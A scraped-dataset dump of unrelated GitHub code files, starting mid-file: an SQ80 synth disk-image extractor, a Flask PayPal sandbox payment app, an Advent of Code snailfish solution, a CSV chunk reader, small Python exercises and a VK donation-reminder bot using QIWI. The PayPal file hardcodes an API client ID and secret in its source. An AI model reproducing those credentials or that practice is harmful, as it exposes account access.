clock.tick(frame_rate)\n","repo_name":"Langeball/CV","sub_path":"RelativeCamera2D.py","file_name":"RelativeCamera2D.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17067362422","text":"import argparse\nimport re\n\n#--------------------\n# globals\n#--------------------\n\nFILE_TYPES=['---','SYS','BNK','SNG','SEQ','SYX','PRG']\nINIT_PROG=bytes([0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x2, 0x0, 0x0, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x2, 0x0, 0x0, 0x16, 0xff, 0xff, 0x80, 0x16, 0xff, 0xff, 0x80, 0x16, 0xff, 0xff, 0x80, 0x24, 0x0, 0xff, 0x0, 0x0, 0x0, 0x68, 0xff, 0x7e, 0x0, 0x24, 0x0, 0xff, 0x0, 0x0, 0x0, 0x68, 0xff, 0x7e, 0x0, 0x24, 0x0, 0xff, 0x0, 0x0, 0x0, 0x68, 0xff, 0x7e, 0x0, 0x7e, 0x7f, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x71, 0x27, 0x27, 0x8f, 0x0]) \n\n#--------------------\n# classes\n#--------------------\n\nclass directory:\n \"\"\" \n object representation of the disk directory \n \"\"\"\n def __init__(self,buf): \n \"\"\" buf is a bytearray containing the disk directory data \"\"\"\n assert(len(buf)==2048)\n self.buf=buf\n \n def banks(self):\n \"\"\" return the bank entries in the directory as a list of bank file_names. None for not defined \"\"\"\n \n banks=[]\n for i in range(0,40):\n dir_entry=self.buf[(i+10)*13:(i+10+1)*13]\n (file_type,file_name,file_size)=(FILE_TYPES[dir_entry[0]],sqbytes_to_ascii(dir_entry[1:11]),int.from_bytes(dir_entry[11:13],'big'))\n # file_size is not used\n\n if file_type=='---':\n banks.append(None)\n else:\n assert file_type == 'BNK'\n banks.append(file_name)\n\n return banks\n \n def progs(self):\n \"\"\" return the prog entries in the directory of prog names. None for not defined \"\"\"\n\n progs=[]\n\n for i in range (0,128):\n prog_name_raw=self.buf[650+i*6:650+(i+1)*6]\n if prog_name_raw[0]==0: # if you skip this check, you can recover\n # deleted programs. only the first char is\n # changed in the directory\n progs.append(None)\n else:\n progs.append(prog_name_raw)\n \n return progs\n\n\n#--------------------\n# functions\n#--------------------\n\ndef chs_to_offset(c,h,s):\n \"\"\"\n convert cylinder, head, sector numbers to a byte offset into a disk dump file\n \"\"\"\n\n\n assert(c>=0 and c<80)\n assert(h>=0 and h<2)\n assert(s>=0 and h<6)\n\n offset = 10 # file header\n offset += (c*2+h)*(5*1024+512)\n offset += s*1024\n\n #print(\"c:{},h:{},s:{} = {}\".format(c,h,s,offset))\n\n return offset\n\ndef prog_to_chs(prog):\n \"\"\"\n convert individual program number (counting from 0) to a c,h,s address.\n \n algorithm taken from sq80toolkit.dvi. One of the overridden sector\n locations was fixed, and two were added (as indicated). The proper values were\n determined by manual inspection of an actual disk image. Without these fixes,\n bad data was being read back for those 3 individual program locations.\n\n \"\"\"\n prog=prog\n sw=(prog & 64)|((prog & 63)+2)\n #print (\"prog_to_chs: prog={}, sw={}\".format(prog,sw))\n\n if sw == 0x06:\n c = 0x42\n h = 0 \n elif sw == 0x19:\n c = 0x42\n h = 1\n elif sw == 0x1f: \n c = 0x43\n h = 0 # sq80toolkit has this as 1\n elif sw == 0x26: # sq80toolit doesn't include this case\n c = 0x43\n h = 1\n elif sw == 0x39:\n c = 0x44\n h = 0\n elif sw == 0x3f:\n c = 0x44\n h = 1\n elif sw == 0x4c: # sq80toolkit doesn't include this case\n c = 0x45\n h = 0\n elif sw == 0x53:\n c = 0x45\n h = 1\n elif sw == 0x6c:\n c = 0x46\n h = 0\n elif sw == 0x73:\n c = 0x46\n h = 1\n else: \n c = (prog & 63)+2\n h = (prog & 64)>>6\n s = 5\n #print(\"c,h,s:{}.{}.{}\".format(c,h,s))\n return(c,h,s)\n\n\ndef sqbytes_to_ascii(b):\n \"\"\"\n convert Ensoniq charset to ASCII\n\n The mapping is taken verbatim from sq80toolkit sq80dir.c.\n \"\"\"\n\n s=\"\"\n maps={ \n 0x00:0x2d,\n 0x21:0x30,\n 0x23:0x31,\n 0x25:0x32,\n 0x28:0x33,\n 0x29:0x34,\n 0x3a:0x35,\n 0x3b:0x36,\n 0x5b:0x37,\n 0x5c:0x38,\n 0x5d:0x39\n }\n\n for c in b:\n\n if c in maps:\n s+=str(chr(maps[c]))\n elif c<32 or c>=127: # non printable characters, this is likely from a corrupt image\n raise RuntimeError(\"Invalid character in string. Likely a corrupt disk.\")\n #s+=str(\"\\\\\"+str(c))\n else:\n s+=str(chr(c))\n\n return s\n\ndef read_bank(bank):\n \"\"\"\n read bank from the image file and return as binary\n \"\"\"\n assert(bank>=0 and bank<40)\n\n sector_offset = (bank%20)*4\n c = 64+int(sector_offset/5)\n h = int(bank/20)\n s = sector_offset%5\n\n data_in=bytearray()\n\n for i in range(0,4):\n args.imagefile.seek(chs_to_offset(c,h,s));\n\n if i!=3:\n data_in+=args.imagefile.read(1024)\n else:\n data_in+=args.imagefile.read(1008)\n\n if s==4:\n s=0\n c+=1\n else:\n s+=1\n\n return data_in\n\ndef dump_bank(bank_data,dump_file): \n \"\"\"\n dump the bank binary data in bank_data to dump_file\n \"\"\"\n\n if args.dump=='syx':\n\n data_out=bytearray(b'\\xf0\\x0f\\x02\\x00') # SQ80 SYS EX HEADER / CH0\n data_out+=b'\\x02' # all program dump\n\n for b in bank_data:\n data_out+=bytes([b&0x0f, b>>4])\n\n data_out+=b'\\xf7' # end of exclusive\n\n else:\n data_out=bank_data\n\n with open(dump_file,\"bx\") as outfile:\n outfile.write(data_out)\n\ndef read_prog(prog_num):\n \"\"\"\n read in individual program and return as binary\n \"\"\"\n assert(prog_num >= 0 and prog_num < 128)\n (c,h,s)=prog_to_chs(prog_num)\n \n args.imagefile.seek(chs_to_offset(c,h,s))\n\n program_data=args.imagefile.read(102) \n\n if (directory.progs()[prog_num] != program_data[0:6]):\n raise RuntimeError(\"program name on disk ({}) doesn't match directory entry ({})\".format(program_data[0:6],directory.progs()[prog_num]))\n return program_data\n\ndef dump_prog(prog_data,dump_file):\n \"\"\"\n dump the program binary data in prog_data to dump_file\n \"\"\"\n\n if args.dump=='syx':\n data_out=bytearray(b'\\xf0\\x0f\\x02\\x00') # SQ80 SYS EX HEADER / CH0\n data_out+=b'\\x01' # single program dump\n\n for b in prog_data:\n data_out+=bytes([b&0x0f, b>>4])\n\n data_out+=b'\\xf7' # end of exclusive\n\n else:\n data_out=prog_data\n\n with open(dump_file,\"bx\") as outfile:\n outfile.write(data_out)\n\ndef mode_prog():\n \"\"\"\n Single program mode\n \"\"\"\n\n if (args.dump):\n print(\"Dumping individual program/s...\")\n else:\n print(\"Listing individual program/s...\")\n\n if args.number:\n assert(args.number>0 and args.number<=128)\n\n # in list mode (if not dumping and no number selected), progs are output 5\n # to a line (like for virtbanks) to allow for more concise listings of\n # disks to be generated\n\n printed_flag=False\n for (prog_num,prog_name_raw) in enumerate(directory.progs()):\n if args.list and not args.number and not args.dump and not (prog_num)% 5 and printed_flag:\n printed_flag=False\n print('')\n\n if args.number and prog_num != args.number - 1: # internally, prog numbers count from 0\n continue\n\n if prog_name_raw is None:\n if (args.number):\n raise RuntimeError(\"Specified prog number appears to be blank\")\n continue; \n\n prog_name=sqbytes_to_ascii(prog_name_raw)\n\n dump_file=\"{}{:03}_{}\".format(args.prefix or \"PROG\",prog_num+1,re.sub(r' *$','',prog_name))\n\n if args.dump=='syx':\n dump_file+='.syx'\n else:\n dump_file+='.bin'\n\n if args.dump:\n print(\" PROG {:2} - {} -> {}\".format(prog_num+1,prog_name,dump_file))\n\n prog_data=read_prog(prog_num)\n dump_prog(prog_data,dump_file)\n else:\n if args.number or not args.list: \n print(\" PROG {:2} - {}\".format(prog_num+1,prog_name))\n else:\n printed_flag=True\n print(\" {:03}:{: <8}\".format(prog_num+1,prog_name),end=\"\")\n\n if args.list and not args.number and not args.dump and printed_flag:\n print('')\n\n return\n \n\ndef mode_bank():\n \"\"\"\n Bank mode \n \"\"\"\n\n if (args.dump):\n print(\"Dumping bank/s...\")\n else:\n print(\"Listing bank/s...\")\n\n # iterate over banks and list/dump them\n\n if args.number:\n assert(args.number>0 and args.number<=40)\n\n for (bank_num,bank) in enumerate(directory.banks()): \n if args.number and bank_num != args.number - 1: # internally, bank numbers count from 0\n continue\n \n if bank is None:\n if (args.number) :\n raise RuntimeError(\"Specified bank number doesn't exist\")\n continue\n\n bank=re.sub(r'\\.*','',bank)\n bank=re.sub(r'/','_',bank)\n\n dump_file=\"{}{:02}_{}\".format(args.prefix or \"BANK\",bank_num+1,bank)\n if args.dump=='syx':\n dump_file+='.syx'\n else:\n dump_file+='.bin'\n\n if args.dump:\n print(\" BANK {:2} - {} -> {}\".format(bank_num+1,bank,dump_file))\n bank_data=read_bank(bank_num)\n\n # do this to trigger to disk corruption check in sqbytes_to_ascii\n for prog_num in (range(0,40)):\n prog_name=sqbytes_to_ascii(bank_data[prog_num*102:prog_num*102+6])\n \n dump_bank(read_bank(bank_num),dump_file)\n\n elif args.list:\n print(\"BANK {:2} - {}\".format(bank_num+1,bank))\n bank_data=read_bank(bank_num)\n for prog_num in (range(0,40)):\n if prog_num and not prog_num % 5:\n print('')\n prog_name=sqbytes_to_ascii(bank_data[prog_num*102:prog_num*102+6])\n print(\" {:03}:{: <8}\".format(prog_num+1,prog_name),end=\"\")\n print('')\n else:\n print(\" BANK {:2} - {}\".format(bank_num+1,bank))\n\n return\n\ndef mode_virtbank():\n \"\"\"\n virtual bank mode\n \"\"\"\n\n print(\"Listing virtual bank contents...\")\n\n bank_num=0\n bank_prog_num=0\n bank_data=b''\n banks=[]\n\n for (prog_num,prog_name_raw) in enumerate(directory.progs()):\n\n if prog_name_raw is None:\n continue\n\n bank_name=\"VIRTBANK{:02}\".format(bank_num+1)\n\n showing_flag = not args.number or args.number-1 == bank_num\n\n if showing_flag:\n if not bank_prog_num:\n print(bank_name)\n\n prog_name=sqbytes_to_ascii(prog_name_raw)\n print(\" {:03}:{: <8}\".format(prog_num+1,prog_name),end=\"\")\n\n bank_data += read_prog(prog_num)\n\n bank_prog_num = (bank_prog_num + 1) % 40\n \n if not bank_prog_num:\n banks.append((bank_num,bank_name,bank_data))\n bank_num+=1\n bank_data=b''\n if showing_flag and not bank_prog_num % 5:\n print('')\n\n if bank_prog_num: # pad out incomplete banks with the init patch\n bank_data += INIT_PROG * (40-bank_prog_num)\n banks.append((bank_num,bank_name,bank_data))\n\n if args.number and args.number-1 > bank_num:\n print(bank_num)\n raise RuntimeError(\"No such virtual bank\")\n\n print()\n if (args.dump):\n print(\"Dumping virtual bank/s...\")\n\n for (bank_num,bank_name,bank_data) in banks:\n if args.number and args.number-1 != bank_num:\n continue\n dump_file=\"{}{:02}\".format(args.prefix or \"VIRTBANK\",bank_num+1)\n if args.dump=='syx':\n dump_file+='.syx'\n else:\n dump_file+='.bin'\n\n print(\" {} -> {}\".format(bank_name,dump_file))\n dump_bank(bank_data,dump_file)\n\n\n#--------------------\n# main body\n#--------------------\n\nif __name__ == '__main__':\n\n # parse arguments\n\n parser = argparse.ArgumentParser(description=\"Dump program banks or individual programs from an SQ80 disk dump file as either literal binary, or SYSEX format. File names for the dump files are automatically generated from the bank/program number and name stored in the disk directory.\")\n parser.add_argument('imagefile',type=argparse.FileType('rb') ,help='The source SQ80 disk image file')\n parser.add_argument('mode',choices=['bank','prog','virtbank'],help='bank: Program bank mode. Dump/list one or all of the 40 program banks. prog: Single program mode. Dump/list one or all of the 128 single programs as individual files. virtbank: Virtual bank mode. Dump/list the 128 single programs as up to 5 virtual banks. Empty program positions in the virtual banks are filled using an init patch with a blank name.\\n')\n #parser.add_argument('--indiv','-i',help='',action='store_true')\n parser.add_argument('--number','-n',type=int,help='The number of the bank/prog/virtbank to list or dump. Otherwise all will be dumped.')\n parser.add_argument('--dump','-d',help='Actually dump the banks/programs/virtbanks (otherwise they are only listed). The parameter should be either \"syx\" or \"bin\". \"syx\" is a SYSEX file that can be output straight to the SQ80 via a midi port. \"bin\" is a literal binary dump of the bank/program.',choices=['syx','bin'])\n parser.add_argument('--prefix','-p',help='Prefix to add to output filenames. Can specify directories than the current using a / in the prefix',action='store')\n parser.add_argument('--list','-l',help='Used to generate listings of programs on a disk in a more concise format (5 programs per line). Can be used in bank mode to list the programs within each bank. Virtbank mode uses the concise format by default, so this flag does nothing.',action='store_true')\n\n args = parser.parse_args()\n if args.number == 0 :\n raise RuntimeError(\"banks/programs count from 1 upwards\")\n\n if args.list and args.dump:\n raise RuntimeError(\"Cannot select --list and --dump at the same time.\")\n\n # check disk image file\n\n header=args.imagefile.read(10)\n if (header != b'!SQ80DISK!'):\n raise RuntimeError(\"Doesn't appear to be a valid SQ80 dump file\")\n\n # read directory\n\n directory_buf=bytearray()\n\n for (c,h,s) in [(0,0,5),(0,1,5),(1,1,5),(1,0,5)]:\n args.imagefile.seek(chs_to_offset(c,h,s))\n directory_buf+=args.imagefile.read(512)\n\n directory=directory(directory_buf)\n\n print(\"SQ80 Disk Image File:\",args.imagefile.name)\n\n if args.mode == 'prog':\n mode_prog()\n elif args.mode == 'bank':\n mode_bank()\n elif args.mode == 'virtbank':\n mode_virtbank()\n","repo_name":"voytekl/protozoid_sq80","sub_path":"extract_sq80.py","file_name":"extract_sq80.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"20313600591","text":"from flask import Flask, render_template, jsonify, request\nimport paypalrestsdk\n\napp = Flask(__name__)\n\npaypalrestsdk.configure({\n \"mode\": \"sandbox\", # sandbox or live\n # CHANGE THIS PART\n \"client_id\": \"AQAo5U4GVQPwJ-pYrultYc5UsQXap7JI1eCjpfL2Bhy7mUau1hVY9BSEnOc3dIYOIFdAnu_C8bbciG2p\",\n \"client_secret\": \"EHU2C0gfNoFH6lLLknJsAYKyzlJ_oj_cYg7eg7uyuIn_qTn8CjVztWNgiJjh1_2X3qD-drZVMIKVoRca\" })\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/payment', methods=['POST'])\ndef payment():\n data = request.get_json()\n payment = paypalrestsdk.Payment({\n \"intent\": \"sale\",\n \"payer\": {\n \"payment_method\": \"paypal\"},\n \"redirect_urls\": {\n \"return_url\": \"http://localhost:3000/payment/execute\",\n \"cancel_url\": \"http://localhost:3000/\"},\n \"transactions\": [{\n # \"item_list\": {\n # \"items\": [{\n # \"name\": \"testitem\",\n # \"sku\": \"12345\",\n # \"price\": \"500.00\",\n # \"currency\": \"USD\",\n # \"quantity\": 1}]},\n \"amount\": {\n \"total\": data['total'],\n \"currency\": \"USD\"},\n \"description\": \"This is the payment transaction description.\"}]})\n\n if payment.create():\n print('Payment success!')\n else:\n print(payment.error)\n\n return jsonify({'paymentID' : payment.id})\n\n@app.route('/execute', methods=['POST'])\ndef execute():\n success = False\n\n payment = paypalrestsdk.Payment.find(request.form['paymentID'])\n\n if payment.execute({'payer_id' : request.form['payerID']}):\n print('Execute success!')\n success = True\n #amqp to cart\n else:\n print(payment.error)\n\n return jsonify({'success' : success})\n\nif __name__ == '__main__':\n app.run(port=5008, debug=True)","repo_name":"GeralynSoochi/ESD","sub_path":"payment - Copy.py","file_name":"payment - Copy.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30793905178","text":"# Code Solution for day 18\n#Time 2022-09-28\nfrom ast import literal_eval\n\n\n# define basic tree data structure\nclass snailfish:\n def __init__(self, data=-1, level = 0, pair=False):\n self.data = data\n self.level = level\n self.pair = pair\n self.left = None\n self.right = None\n self.parent = None\n\n def add_leftchild(self, data= -1, level=0, pair= False):\n self.left = snailfish(data, level, pair)\n self.left.parent = self\n\n def add_rightchild(self, data= -1, level=0, pair= False):\n self.right = snailfish(data, level, pair)\n self.right.parent = self\n\n def add_leftnode(self, node):\n self.left = node\n self.left.parent = self\n\n def add_rightnode(self, node):\n self.right = node\n self.right.parent = self\n\n def get_data(self):\n return self.data\n\n def get_level(self):\n return self.level\n\n def is_pair(self):\n return self.pair\n\n\nclass Solution:\n def __init__(self, file):\n self.input = open(file, 'r').read().splitlines()\n self.numbers = [literal_eval(line) for line in self.input]\n\n @staticmethod\n def build_tree(number):\n root = snailfish(level=0,pair=True)\n queue = [(root, number)]\n while len(queue) > 0:\n current, number = queue.pop(0)\n left, right = number\n if isinstance(left, int):\n current.add_leftchild(data=left, level=current.level+1, pair=False)\n else:\n current.add_leftchild(data=-1, level=current.level+1, pair=True)\n queue.append((current.left, left))\n if isinstance(right, int):\n current.add_rightchild(data=right, level=current.level+1, pair=False)\n else:\n current.add_rightchild(data=-1, level=current.level+1, pair=True)\n queue.append((current.right, right))\n return root\n\n @staticmethod\n def addition(root1, root2):\n root = snailfish(level=0,pair=True)\n root.add_leftnode(root1)\n root.add_rightnode(root2)\n queue = [root]\n # update level\n while len(queue) > 0:\n current = queue.pop(0)\n if current.left is not None:\n current.left.level = current.level + 1\n queue.append(current.left)\n if current.right is not None:\n current.right.level = current.level + 1\n queue.append(current.right)\n return root\n\n @staticmethod\n def explode(node: snailfish):\n # explosion of one node\n assert node.left.pair is False\n assert node.right.pair is False\n left_value, right_value = node.left.data, node.right.data\n node.pair = False\n node.data = 0\n node.left.parent = None\n node.right.parent = None\n node.left = None\n node.right = None\n\n current = node\n parent = node.parent\n # update left_value, right_value\n if parent:\n while parent.left == node:\n node = parent\n parent = node.parent\n if parent is None:\n break\n\n if parent is not None:\n node = parent.left\n # find rightmost node\n while node.pair:\n node = node.right\n node.data += left_value\n\n node = current\n parent = node.parent\n if parent:\n while parent.right == node:\n node = parent\n parent = node.parent\n if parent is None:\n break\n\n if parent is not None:\n node = parent.right\n # find leftmost node\n while node.pair:\n node = node.left\n node.data += right_value\n\n @staticmethod\n def split(node: snailfish):\n # split of one node\n assert node.pair is False\n left_value, right_value = node.data // 2, node.data - node.data // 2\n node.pair = True\n node.data = -1\n node.add_leftchild(left_value, node.level + 1, False)\n node.add_rightchild(right_value, node.level + 1, False)\n\n @staticmethod\n def print_tree(root: snailfish):\n queue = [root]\n # print tree in BFS\n print('Tree result in BFS')\n while len(queue)>0:\n current = queue.pop(0)\n if current.pair:\n print('Pair {}'.format(current.level), end=' ,')\n else:\n print('Data {}:'.format(current.level), current.data, end=' ,')\n if current.left is not None:\n queue.append(current.left)\n if current.right is not None:\n queue.append(current.right)\n print()\n\n @staticmethod\n def lmr_explode(root: snailfish):\n if root.left.is_pair():\n if Solution.lmr_explode(root.left):\n return True\n # first check if apply to explode\n if root.is_pair():\n if root.level >= 4:\n #print('Explode node: [{}, {}] at level {}'.format(root.left.data, root.right.data, root.level))\n Solution.explode(root)\n return True\n\n if root.right.is_pair():\n if Solution.lmr_explode(root.right):\n return True\n\n @staticmethod\n def lmr_split(root:snailfish):\n if root.left is not None:\n if Solution.lmr_split(root.left):\n return True\n\n if root.is_pair() is False:\n if root.data >= 10:\n Solution.split(root)\n return True\n\n if root.right is not None:\n if Solution.lmr_split(root.right):\n return True\n\n @staticmethod\n def magnitude(root):\n if not root.pair:\n return root.data\n else:\n return 3 * Solution.magnitude(root.left) + 2 * Solution.magnitude(root.right)\n\n def part1(self):\n # lmr traversal in tree\n left = None\n for number in self.numbers:\n if left is None:\n left = self.build_tree(number)\n continue\n right = self.build_tree(number)\n root = self.addition(left, right)\n # reduce process\n while True:\n # first check all the exploding condition\n flag = None\n while self.lmr_explode(root) is not None:\n pass\n #then check if exists any splitting condition\n flag = self.lmr_split(root)\n if flag is None:\n break\n left = root\n # print('After update')\n # Solution.print_tree(root)\n\n return Solution.magnitude(root)\n\n def reduce(self, left: snailfish, right: snailfish):\n lr = self.addition(left, right)\n\n while True:\n flag = None\n while self.lmr_explode(lr) is not None:\n pass\n\n flag = self.lmr_split(lr)\n if flag is None:\n break\n\n return lr\n\n def part2(self):\n magnitude = 0\n # O(n^2)\n for i in range(len(self.numbers)):\n for j in range(len(self.numbers)):\n if i == j:\n continue\n left = self.build_tree(self.numbers[i])\n right = self.build_tree(self.numbers[j])\n result= self.reduce(left, right)\n magnitude = max(magnitude, Solution.magnitude(result))\n\n return magnitude\n\n\nif __name__ == \"__main__\":\n s = Solution('input.txt')\n print(s.part1())\n print(s.part2())\n","repo_name":"dengkaiDK/adventofcode","sub_path":"2021/day18/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35271372489","text":"import pandas\nimport sys\n\nif len(sys.argv) < 2:\n print(\"Usage: \" + sys.argv[0] + \" []\")\n exit()\n\nis_first = True\nchunks = pandas.read_csv(sys.argv[1], engine='python', sep=None, keep_default_na=False, chunksize=1000000)\nfor chunk in chunks:\n if (is_first):\n # First chunk - print width and column names\n input()\n print(chunk.shape[1])\n for i in range(chunk.shape[1]):\n input()\n print(chunk.columns[i])\n is_first = False\n # Every chunk - print height and cells\n input()\n print(chunk.shape[0])\n for i in range(chunk.shape[0]):\n for j in range(chunk.shape[1]):\n input()\n print(chunk.iloc[i][j])\ninput()\nprint(-1)","repo_name":"erased-generic/py-table","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29695424727","text":"p=1\r\nwhile(p==1):\r\n n = int(input(\"Enter the no. of elements in list: \"))\r\n l = []\r\n print('Enter elements of the list: ')\r\n for i in range(n):\r\n l.append(int(input()))\r\n# reversing the list using l[::-1]\r\n# comparing reversed list with user entered list\r\n if l == l[::-1]:\r\n print(\"It is a palindrome\")\r\n else:\r\n print(\"Not a palindrome\")\r\n flag=0\r\n while(flag == 0):\r\n p = int(input(\"Enter 1 to continue and 0 to exit : \"))\r\n if(p!=1 and p!=0):\r\n print(\"Invalid entry\")\r\n if(p==1 or p==0):\r\n flag=1\r\n","repo_name":"srimedhabc/ITT-lab","sub_path":"ITT-lab/lab5/Lab5qd.py","file_name":"Lab5qd.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4352380589","text":"#!/usr/bin/env python\n\"\"\"@package docstring\n@brief\tconverter_f2i verilog test\n@details get data compared to cpp and verilog\n\"\"\"\nif __name__ == \"__main__\":\n from Test_Converter.Test_Converter import TestConverter\n from sys import exit\n\n converter_test = TestConverter(converter_type=1, test_title=\"Converter_F2I_Test\",\n cpp_execute_file=\"../cmake-build-debug/Converter_F2I/Converter_F2I_CPP/converter_f2i\"\n )\n converter_test.set_output_file_verilog(\"../Data/Converter_F2I/Output_Z_Verilog\")\n converter_test.set_cpp_execute_file(\"../cmake-build-debug/Converter_F2I/Converter_F2I_CPP/converter_f2i\")\n converter_test.set_verilog_compile_list(\"./Stimulus/file_reader.v ./Stimulus/file_writer.v \"\n \"./Stimulus/test_bench.v ./Stimulus/test_bench_tb.v \"\n \"./Source/converter_f2i.v\")\n if converter_test.run_test() == 1:\n converter_test.compare_output(\"../Data/Converter_F2I/\")\n exit(1)\n else:\n exit(-1)\n","repo_name":"wjdwls0630/khu_sensor","sub_path":"00_RTL_Design/Source/Filter_Test/Filter_Test_Verilog/Converter_F2I/converter_f2i_test.py","file_name":"converter_f2i_test.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"6317463341","text":"import vk_api\nfrom vk_api.utils import get_random_id\nfrom vk_api.bot_longpoll import VkBotLongPoll, VkBotEventType\nimport json\nfrom Db import Db\nfrom qiwiActions import invoice, pay_status\nfrom datetime import datetime\nfrom time import sleep\nfrom threading import Thread\nfrom dvach import po_random_comment\n\nwith open('config.json') as config:\n conf_data = json.load(config)\nQIWI_SECRET = conf_data['qiwi_cash_secret_key']\n\nvk_session = vk_api.VkApi(token=conf_data['vk_api_token'])\nvk = vk_session.get_api()\nlongpoll = VkBotLongPoll(vk_session, conf_data['vk_group_id'])\n\ndonate_amount = 200\n\nmonths = ['', 'январь', 'февраль', 'март', 'апрель', 'май', 'июнь', 'июль', 'август', 'сентябрь', 'октябрь', 'ноябрь',\n 'декабрь']\n\n\ndef answer_vk_message(event, text):\n vk.messages.send(\n random_id=get_random_id(),\n user_id=event.message['peer_id'],\n message=text\n )\n\n\ndef answer_vk_chat(event, text):\n vk.messages.send(\n random_id=get_random_id(),\n chat_id=event.chat_id,\n message=text\n )\n\n\ndef send_vk_message(person_id, text):\n vk.messages.send(\n random_id=get_random_id(),\n user_id=person_id,\n message=text\n )\n\n\ndef become_donator(db, event):\n id = event.message['peer_id']\n person = db.get_person(id)\n answer = 'Подписка на ежемесячные уведомления о взносах успешно оформлена'\n if not person:\n db.insert_person(id, True)\n else:\n if person['is_donater'] is False:\n db.update_donater_status(id, True)\n else:\n answer = 'Вы уже подписаны на уведомления о взносах'\n answer_vk_message(event, answer)\n if not db.did_person_get_invoice_this_month(id):\n answer = form_new_payment(db, id, donate_amount)\n answer_vk_message(event, answer)\n\n\ndef stop_being_donator(db, event):\n id = event.message['peer_id']\n person = db.get_person(id)\n answer = 'Вы не подписаны на уведомления о взносах'\n if person:\n if person['is_donater'] is True:\n db.update_donater_status(id, False)\n answer = 'Подписка на ежемесячные уведомления о взносах прекращена(('\n answer_vk_message(event, answer)\n\n\ndef show_debt(db, event):\n id = event.message['peer_id']\n person = db.get_person(id)\n if not person:\n answer = 'Вы не подписаны на получение уведомлений о взносах. \\n' + \\\n 'Для того, чтобы стать жертвователем, наберите команду donate'\n else:\n update_person_payments_statuses(db, id)\n debts = list(db.select_person_debt(id))\n if not debts:\n answer = 'У вас нет неоплаченных долгов :)'\n else:\n debt_urls = [debt['url'] for debt in debts]\n answer = 'Текущие долги: \\n' + \\\n '\\n'.join([debt_url for debt_url in debt_urls])\n answer_vk_message(event, answer)\n\n\ndef update_person_payments_statuses(db, id):\n debts = db.select_person_debt(id)\n for debt in debts:\n payment_id = debt['id']\n if pay_status(payment_id, QIWI_SECRET) == db.PAID:\n db.update_payment_status(payment_id, db.PAID)\n\n\ndef send_invoice(db, event):\n id = event.message['peer_id']\n answer = form_new_payment(db, id, donate_amount)\n answer_vk_message(event, answer)\n\n\ndef send_command_list(event):\n answer = \"\"\"\n Список команд бота:\n \n 𝐃𝐨𝐧𝐚𝐭𝐞 - получать ежемесячные уведомления о взносах\n 𝐒𝐭𝐨𝐩 𝐝𝐨𝐧𝐚𝐭𝐞 - отписаться от ежемесячных уведомлений о взносах\n 𝐃𝐞𝐛𝐭 - проверить наличие долгов по взносам\n \"\"\"\n answer_vk_message(event, answer)\n\n\ndef send_monthly_notification_to_donaters(db):\n donaters = db.select_donaters()\n for donater in donaters:\n id = donater['id']\n if not db.did_person_get_invoice_this_month(id):\n message = form_new_payment(db, id, donate_amount)\n send_vk_message(id, message)\n\n\ndef send_weekly_debt_reminder_to_donaters(db):\n donaters = db.select_donaters()\n for donater in donaters:\n id = donater['id']\n update_person_payments_statuses(db, id)\n debts = list(db.select_person_debt(id))\n if debts:\n debt_urls = [debt['url'] for debt in debts]\n message = 'Не забываем про долги =) \\n' + '\\n'.join([debt_url for debt_url in debt_urls])\n send_vk_message(id, message)\n\n\n\ndef form_new_payment(db, person_id, donate_amount):\n payment_id = db.get_new_payment_id()\n invoice_url = invoice(payment_id, donate_amount, QIWI_SECRET)\n _, date = db.insert_payment(person_id, donate_amount, invoice_url)\n answer = '\\n Новая платежка за ' + months[date.month] + ' ' + str(date.year) + '\\n' + invoice_url\n return answer\n\n\ndef bot_main():\n db = Db()\n for event in longpoll.listen():\n if event.type == VkBotEventType.MESSAGE_NEW:\n if event.from_user:\n if event.message['text'].lower() == 'donate':\n become_donator(db, event)\n elif event.message['text'].lower() == 'stop donate':\n stop_being_donator(db, event)\n elif event.message['text'].lower() == 'debt':\n show_debt(db, event)\n elif event.message['text'].lower() == 'invoice123':\n send_invoice(db, event)\n else:\n send_command_list(event)\n elif event.from_chat:\n if event.message['text'].lower() == '/po' or \\\n event.message['text'].lower() == '/по' or \\\n event.message['text'].lower() == '/ро':\n answer_vk_chat(event, po_random_comment())\n\n\ndef mailing():\n db = Db()\n last_mailing_month = 0\n last_debt_mailing_week = 0\n while True:\n now = datetime.now()\n if now.hour >= 19:\n current_week = now.isocalendar()[1]\n if now.weekday() == 0 and last_debt_mailing_week != current_week:\n send_weekly_debt_reminder_to_donaters(db)\n last_debt_mailing_week = current_week\n if last_mailing_month != now.month:\n if not db.is_mailing_exist(now.month, now.year):\n send_monthly_notification_to_donaters(db)\n db.insert_mailing(now.month, now.year, True)\n last_mailing_month = now.month\n\n sleep(1800)\n\n\nif __name__ == '__main__':\n thread_pool = {\n 'chat_bot': Thread(target=bot_main),\n 'mailing': Thread(target=mailing)\n }\n\n for thread in thread_pool:\n thread_pool[thread].start()\n\n while True:\n sleep(10)\n for thread in thread_pool:\n if not thread_pool[thread].is_alive():\n if thread == 'chat_bot':\n thread_pool[thread] = Thread(target=bot_main)\n if thread == 'mailing':\n thread_pool[thread] = Thread(target=mailing)\n 